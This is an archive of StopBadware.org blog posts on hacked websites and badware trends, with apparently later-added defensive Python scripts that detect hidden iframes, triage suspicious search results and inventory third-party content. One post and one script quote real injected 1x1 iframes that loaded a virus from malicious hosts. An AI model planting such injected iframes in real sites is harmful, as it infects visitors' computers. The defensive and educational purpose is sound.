StopBadware.org RSS
Regaining Control of Our Computers
 

No such thing as a guaranteed safe site

Posted by Erica George Fri, 27 Jun 2008 15:54:00 GMT

When I talk to friends about web-based badware, one of the most frequent things I hear is a version of “Oh, I don’t have to worry about that – I don’t go to any sketchy sites.” The security world has known for a while now that even legitimate, trusted websites can be hacked, but that knowledge still hasn’t made its way out to much of the public. It often takes the hacking of a prominent site to shatter the illusion.

This week, the website of ICANN, the Internet Corporation for Assigned Names and Numbers, was hacked and defaced, along with the site for IANA, the Internet Assigned Numbers Authority. ICANN is the group in charge of internet governance at its most basic level, choosing which new top-level domains (like .com or .org) to create, and setting the protocols for how internet addresses work. Ironically, it was the domain name settings for the ICANN and IANA sites themselves that were hacked and redirected to a page with a derisive message.

Fortunately, the hackers appear to be a group from Turkey more interested in mischief and notoriety than in harming users’ computers, but it would have been easy to redirect ICANN and IANA visitors to a malicious site if that had been their goal.

The lesson? As ZDNet’s Dancho Danchev put it:

One thing’s for sure though, if the ICANN and IANA can lose control of their domains, anyone can.

Google's new resource for owners of compromised sites

Posted by Erica George Wed, 21 May 2008 18:52:00 GMT

Google has rolled out a new resource for owners of compromised websites that it flags as potentially dangerous in its search results.

Google Diagnostics shows information about malware and malware-distributing behaviors that Google has observed on the site within the past 90 days.

We’re already hearing from website owners and the volunteers in our discussion group that the new diagnostics pages are helpful in discovering problems with a site. We’d like to applaud Google for taking this step in greater transparency. This new resource should help website owners in cleaning and securing their sites faster, which will help protect even more internet users.

You can see an example diagnostics page here.

StopBadware discussion group sees flurry of hacked WordPress blogs

Posted by Erica George Mon, 18 Feb 2008 21:19:00 GMT

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group began receiving in January a flurry of reports about WordPress blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both of the following iframes were injected into their posts:

<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

<!-- Traffic Statistics --> <iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren’t put on the pages by the authors, and they’re not for traffic statistics. The iframes, hosted on sites in Beijing, China, attack a visitor’s computer with the virus JS_PSYME.XP.

In this StopBadware thread about the iframes, a post by member Ty H describes how to use WordPress Site Admin to repair defaced blog posts.

In addition to repairing the pages, webmasters need to close the vulnerability that allows the iframe injections to occur.
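The two injected frames above share the traits a cleanup script can key on: a 1x1 pixel size that keeps them invisible, and the bogus "Traffic Statistics" comment wrapper. The following Python is an added example, not code from StopBadware or the discussion thread: it scans a post body (a constructed sample below, with the page's own two injected iframes and one legitimate embed) for hidden iframes, lists their sources for review, and strips the injected blocks. It generalizes beyond these two hostnames to any 1x1 or display:none iframe, which is why the legitimate, visibly sized embed is left alone.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample post body: one legitimate embed plus the two injected
# "Traffic Statistics" iframes quoted in the post (hostnames left broken with
# a space, exactly as the page prints them).
SAMPLE_POST = (
    "<p>Welcome to my blog.</p>\n"
    '<iframe src="https://player.example.com/embed/123" width="560" height="315"></iframe>\n'
    '<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" '
    'frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->\n'
    "<p>More text.</p>\n"
    '<!-- Traffic Statistics --> <iframe src="http://61.132.75. 71/iframe/wp-stats.php" '
    'frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->\n'
)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*"([^"]*)"')
# The injected frames sit between these two comments; remove the whole bracket.
WRAPPED_RE = re.compile(
    r"<!--\s*Traffic Statistics\s*-->\s*<iframe\b[^>]*>.*?</iframe>\s*"
    r"<!--\s*End Traffic Statistics\s*-->",
    re.IGNORECASE | re.DOTALL,
)


def _px(value: str):
    """Parse '1' or '1px' into an int; None when the attribute is absent or odd."""
    try:
        return int(value.strip().lower().removesuffix("px"))
    except ValueError:
        return None


def is_hidden(attrs: Dict[str, str]) -> bool:
    """A frame the visitor cannot see (1x1 pixel or display:none) is the
    hallmark of an injection rather than an embed the author chose."""
    height, width = _px(attrs.get("height", "")), _px(attrs.get("width", ""))
    if height is not None and width is not None and height <= 1 and width <= 1:
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def find_hidden_iframes(html: str) -> List[Dict[str, str]]:
    """Return every hidden iframe with its src, so the webmaster can review them."""
    hits = []
    for match in IFRAME_RE.finditer(html):
        attrs = dict(ATTR_RE.findall(match.group(0)))
        if is_hidden(attrs):
            hits.append({"src": attrs.get("src", ""), "tag": match.group(0)})
    return hits


def strip_hidden_iframes(html: str) -> Tuple[str, int]:
    """Remove the comment-wrapped injections first, then any other hidden
    iframe; returns the cleaned HTML and how many frames were removed."""
    cleaned, removed = WRAPPED_RE.subn("", html)
    for tag in {hit["tag"] for hit in find_hidden_iframes(cleaned)}:
        removed += cleaned.count(tag)
        cleaned = cleaned.replace(tag, "")
    return cleaned, removed


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_POST):
        print("hidden iframe ->", hit["src"])
    cleaned_html, count = strip_hidden_iframes(SAMPLE_POST)
    print(f"removed {count} injected frame(s)")
```

Run it over each post's content (for WordPress, the post_content column of a database export) and review the listed sources before writing anything back; the script only removes frames, so the vulnerability that let them in still has to be closed separately.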

On Feb. 5, WordPress issued version 2.3.3, an urgent security release to patch a flaw in xmlrpc.php that allowed a user to edit posts of other users. It’s not stated whether this release is a response to the iframe injections, but the discussion group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at http://wordpress.org/ to receive email notifications when new versions are announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at Secunia.

When users solve problems together in the StopBadware discussion group and report their findings, it helps others who encounter the same problem later.

Half of malware-distributing websites have been hacked

Posted by Erica George Tue, 22 Jan 2008 20:51:00 GMT

Security vendor Websense has released a report showing that half of the malware-distributing websites it examined in the second part of 2007 were otherwise legitimate sites that had been hacked. The report points to unpatched software vulnerabilities and problems on shared hosting servers as key infection points for hacked sites.

For the many owners of hacked websites StopBadware has worked with over the past year, the fact that so many other sites are in the same predicament is slim consolation for the damage caused. Many owners of small business, nonprofit, and interest-based sites are what we at StopBadware have come to call “consumer webmasters” – website owners who’ve taken advantage of easy and cheap hosting plans and the simplicity of many content management systems to create fully functioning websites without needing technical skills. When a consumer webmaster’s site is hacked, he or she has no technical staff to turn to, and may not even know where to look online for help.

If you’re a website owner, don’t wait until your site is hacked to find help. Talk with your web hosting provider about their security precautions, and ask them how they’d handle a malicious attack. Look for user forums for the software you use to manage your site, and make sure you’ll be one of the first to know when there are new security updates. Finding a network of others working with the same website setup will mean you have peers to turn to if your site ever does run into problems.

Of course, StopBadware’s own resources are also available. Our security tips for webmasters are designed for owners of any site, whether or not it has been the victim of a hacking attack. And our discussion group is a growing community where webmasters (and any internet user) can seek help and advice. For every internet user, the hacking of legitimate websites is a reason for caution. Even trusted sites can be attacked, so it’s important to protect your computer regardless of where your web surfing takes you. If you don’t know where to begin, start at our help pages on badware.

Hackers gaming search results with malware

Posted by Erica George Thu, 29 Nov 2007 21:33:00 GMT

In the last few days, there has apparently been a surge of badware-distributing web sites that trick search engines into thinking they’re legitimate. Researchers at Sunbelt Software first reported the gaming of Google results a few days ago, with articles following from the BBC, ComputerWorld, and others. Google* has reportedly removed the offending sites from its results, saying violations of its quality guidelines can lead to removal from its index. The gaming attacks have also affected other major search engines, though reports indicate the exploits on the malicious websites were coded to target only Google searchers.

The attacks were carried out on massive numbers of newly registered domains, apparently primarily hosted in the US but registered in China. Be suspicious of highly ranked search results that appear to be from a US-based site, but that link to a .cn (Chinese) or other national domain in the website’s address, and of websites whose addresses are entirely strings of random characters without any words or names. As always, an important part of protecting yourself online is keeping your software – including browsers, anti-virus and anti-spyware applications – up to date. If you suspect your computer may have been infected, check out our tips for badware removal.

* Note: Google is a StopBadware sponsor and partner.
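The two warning signs above (a national domain that does not match where the site claims to be, and a domain made of random characters) can be turned into a simple triage check. The Python below is an added example, not a StopBadware tool: it takes a search-result URL and the country the result presents itself as coming from, and returns the reasons for suspicion. The vowel and consonant-run test for "random-looking" labels is a heuristic of this example's own, so expect some false positives (a legitimate .cn site, or an abbreviation-style brand name) and treat a hit as a prompt to look closer, not a verdict.

```python
from typing import Dict, List
from urllib.parse import urlsplit

VOWELS = set("aeiouy")


def looks_random(label: str) -> bool:
    """Heuristic for the 'strings of random characters' warning sign: a domain
    label with no vowels at all, or a run of six or more consonants/digits."""
    letters = [c for c in label if c.isalpha()]
    if len(label) >= 8 and not any(c in VOWELS for c in letters):
        return True
    run = 0
    for c in label:
        if (c.isalpha() and c not in VOWELS) or c.isdigit():
            run += 1
            if run >= 6:
                return True
        else:
            run = 0
    return False


def assess_result(url: str, claimed_country: str = "us") -> List[str]:
    """Return the reasons a search result deserves suspicion (empty list = none).
    claimed_country is the country code the result appears to come from."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    reasons = []
    tld = labels[-1]
    # Two-letter TLDs are national domains; flag one outside the claimed country.
    if len(tld) == 2 and tld != claimed_country.lower():
        reasons.append(f"national domain .{tld} does not match claimed country .{claimed_country}")
    registrable = labels[-2] if len(labels) >= 2 else host
    if looks_random(registrable):
        reasons.append(f"domain name '{registrable}' looks like random characters")
    return reasons


def triage(results: List[str], claimed_country: str = "us") -> Dict[str, List[str]]:
    """Map each URL that raised at least one reason to its reasons."""
    flagged = {}
    for url in results:
        reasons = assess_result(url, claimed_country)
        if reasons:
            flagged[url] = reasons
    return flagged


# Constructed sample of search-result URLs (placeholder hostnames, not real IoCs).
SAMPLE_RESULTS = [
    "http://www.stopbadware.org/home/security",
    "http://xkqzvbtr.cn/free-download.html",
    "http://qwrtpsdfgh.com/codec/",
    "http://example.co.uk/news",
]

if __name__ == "__main__":
    for url, why in triage(SAMPLE_RESULTS).items():
        print(url, "->", "; ".join(why))
```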

Background images emerging tool of MySpace hackers

Posted by Erica George Fri, 09 Nov 2007 22:41:00 GMT

MySpace users, look out for a new brand of website hacking technique that’s emerged over the past week. The hack inserts code that loads a background image linking back to a badware site, and has so far had several prominent victims, most notably pop star Alicia Keyes.

A user who clicks anywhere on the site that is not a legitimate, pre-existing link will be redirected by the linked background image to the badware site, apparently hosted in China. The user will also be prompted to download a codec to view videos – something one might expect on a MySpace page – which itself delivers malware.

The attacks were first noted last week by researchers at FaceTime Communications, and have gained widespread coverage this week due to the hacking of Keyes’s page.

While MySpace reacted quickly to reports of the hacks, there is also word that Keyes’s page, at least, has been reinfected once. There’s no estimate yet on how many users may have been infected, or how many MySpace pages have been compromised, but one thing seems certain: this is a technique to watch out for in the future, on MySpace, and beyond.

Russian Business Network badware shop goes underground

Posted by Erica George Fri, 09 Nov 2007 15:54:00 GMT

The internet security community is buzzing with the news that the Russian Business Network (RBN), a notorious group of professional badware distributors and online criminals, has pulled down its websites and abandoned its IP addresses, effectively vanishing from the internet. The RBN has been behind numerous large-scale attacks, and has been traced as an attacking source of several sites that have ended up in the Badware Website Clearinghouse.

Unfortunately, it seems clear that the RBN’s disappearance is simply a technique for moving deeper underground, a move likely precipitated by recent increased attention and publicity around the RBN. The anti-malware company Trend Micro already reports observing RBN-like activity in China and other parts of Asia.

It’s unlikely that the RBN will consolidate operations in any new home in the same way it operated for so long in Russia, instead diversifying the locations of both its online and on-the-ground operations, making it harder to track. For security researchers and makers of protective software, the disappearance of the RBN is less a victory than a new challenge.

Hidden dangers in third party content

Posted by Erica George Thu, 06 Sep 2007 21:56:00 GMT

If you’re a regular reader of this blog, by now you’re probably familiar with the idea of hackers who inject code – often invisible iframes or javascript – onto otherwise innocent but poorly secured sites.

Another way that sites can be compromised is equally important but often harder to recognize: third party content. When we think about third party content, we often think about ad networks, which place outside links, text, and often graphics on participating websites. Ads aren’t the only way third party content is used on today’s websites, however. Many sites use hit counters that are hosted independently, as well as website “toys” and decorations such as remotely hosted images.

In many cases, third party content is perfectly fine. There are safe ads, safe counters, and safe remote image hosts. If you’re a webmaster, choosing to use third party content on your site means taking responsibility to be sure that content is safe, and remains safe. Carefully screen the ad networks you choose to partner with, and ask how they prevent badware from compromising their network. Do a quick internet search and see what other users are saying about the security of that new counter you’re thinking about installing. And once you’re using third party content on your site, regularly check to be sure that it’s still safe.

Choosing to use third party content means inviting someone else to have control over part of your website. Choose carefully, and stay vigilant, to help keep your website’s visitors safe and your site secure.
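"Regularly check" is easier to keep up when the check is scripted. The Python below is an added example, not a StopBadware or Google tool: it parses a page and inventories every remote origin that page pulls a script, image, frame, stylesheet or embed from, then reports any origin that is not on the webmaster's own allowlist of approved ad networks, counters and image hosts. The sample page and hostnames are constructed placeholders. A new origin showing up in that report is exactly the kind of change worth investigating, whether it came from a compromised partner or from an injection on your own site.

```python
from html.parser import HTMLParser
from typing import Dict, List, Set, Tuple
from urllib.parse import urljoin, urlsplit

# Elements whose attribute pulls a resource from another host into the page.
RESOURCE_ATTRS = {"script": "src", "img": "src", "iframe": "src",
                  "link": "href", "embed": "src", "object": "data"}


class ThirdPartyInventory(HTMLParser):
    """Collects every remote origin a page loads content from."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.page_host = (urlsplit(page_url).hostname or "").lower()
        self.origins: Dict[str, List[Tuple[str, str]]] = {}

    def handle_starttag(self, tag, attrs):
        attr_name = RESOURCE_ATTRS.get(tag)
        if attr_name is None:
            return
        value = dict(attrs).get(attr_name)
        if not value:
            return
        full = urljoin(self.page_url, value)   # resolves relative and // URLs
        parts = urlsplit(full)
        host = (parts.hostname or "").lower()
        if parts.scheme not in ("http", "https") or not host or host == self.page_host:
            return                             # first-party or non-web resource
        origin = f"{parts.scheme}://{host}"
        self.origins.setdefault(origin, []).append((tag, full))


def inventory(page_url: str, html: str) -> Dict[str, List[Tuple[str, str]]]:
    """Origin -> list of (element, resolved URL) for everything loaded remotely."""
    parser = ThirdPartyInventory(page_url)
    parser.feed(html)
    return parser.origins


def unapproved_origins(page_url: str, html: str, allowlist: Set[str]) -> List[str]:
    """Origins present on the page that the webmaster never approved."""
    return sorted(o for o in inventory(page_url, html) if o not in allowlist)


# Constructed sample page and allowlist (hostnames are placeholders).
PAGE_URL = "http://www.example-blog.test/index.html"
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="/style.css">
<script src="https://ads.partner-network.test/show_ads.js"></script>
</head><body>
<img src="/images/logo.png" alt="logo">
<img src="http://counter.hitcounter-host.test/count.gif?id=42" width="1" height="1">
<iframe src="//unknown-widget.test/weather.html" width="200" height="100"></iframe>
</body></html>"""
APPROVED = {"https://ads.partner-network.test", "http://counter.hitcounter-host.test"}

if __name__ == "__main__":
    for origin, uses in inventory(PAGE_URL, SAMPLE_PAGE).items():
        print(origin, "<-", ", ".join(f"<{tag}>" for tag, _ in uses))
    print("unapproved:", unapproved_origins(PAGE_URL, SAMPLE_PAGE, APPROVED))
```

Save the allowlist alongside the site and run the check on a schedule; because the report lists only origins you have not explicitly approved, it stays quiet until something actually changes.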

"No tears, no glory": Rebecca the webmaster traces a hacking attack to her site

Posted by Erica George Tue, 21 Aug 2007 20:48:00 GMT

The webmaster of a site that was hacked to distribute badware has teamed up with a volunteer on the StopBadware discussion forum to trace the hack through her site, and share her story with others. Rebecca the webmaster and Jart the volunteer hope their case study of the cleaning and securing of Rebecca’s site can help educate other webmasters about dealing with attacks and the bad code and backdoors hackers can leave behind.

Rebecca first learned that something had happened to her site when a badware warning appeared in search results for the site on Google. Following Google’s pointers to StopBadware’s Security Tips, Rebecca checked her site and found hidden iframes she knew she hadn’t inserted. She removed the iframes, but was surprised to learn that the issues on her site went even deeper.

With the help of StopBadware volunteer Jart, Rebecca uncovered subtler hacks, including SQL injections and administrator accounts that gave unknown parties full access to her site. Rebecca outlines the various steps Jart helped her through to determine the extent of the damage to her site, and to regain control by securing the site against future attacks. Now Rebecca is learning from Jart so that she too can help others clean and secure their sites.

The quick case study is well worth the read for any webmaster, whether or not their site has been hacked. Thanks, Rebecca and Jart, for sharing it with us!

Malicious Hacking: One Site’s Story

Posted by Erica George Mon, 26 Mar 2007 19:55:00 GMT

If you’ve been following StopBadware’s work over the past few months, you know that we have witnessed a sharp increase in the number of websites distributing badware. More and more of these sites are turning out not to be malicious distributors of bad software, but otherwise innocent websites that have been hacked and made to distribute badware without the knowledge of the sites’ owners. In the past weeks, we’ve even seen hacking attacks hit the sites of several friends of the Berkman Center, StopBadware’s parent institution at Harvard.

Berkman fellow Ethan Zuckerman shares a detailed and insightful account of one such attack in a recent post to his blog. A website owned by a friend of Zuckerman’s was hacked, and subject to a Google search warning and listing in the Badware Website Clearinghouse. Zuckerman initially assumed that his friend’s site must be listed by mistake, but quickly learned that the site had been compromised. As Zuckerman tracked down what had happened to his friend’s site, he uncovered the source of the attack – an organized crime outfit known as the RBusiness Network, currently based in Panama.

How risky is an infected site to visitors? Zuckerman examines one of the exploits used by RBusiness, noting that “[b]asically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system.” Badware producers then use these invisible downloads to steal financial data for use in fraud or identity theft.

StopBadware is not the only group noticing increases in this kind of website hack. Symantec’s recent Internet Security Threat Report, for example, noted an increase in malware designed to steal financial data from victims.

How can you protect yourself? If you run a website, check out StopBadware’s Security Tips page, and talk to your hosting provider to be sure your site is secure. When browsing the internet, be sure your computer is running up-to-date, fully patched software, with anti-virus and anti-spyware protection. Last, if you do come across badware as you surf the internet, please share your story. The more we know about badware and the criminals who produce it, the better we can help internet users and webmasters keep themselves safe.

 



Consumer Reports WebWatch is not receiving any corporate support for its participation in this program.

Copyright © 2006 - All content for this site is under a Creative Commons license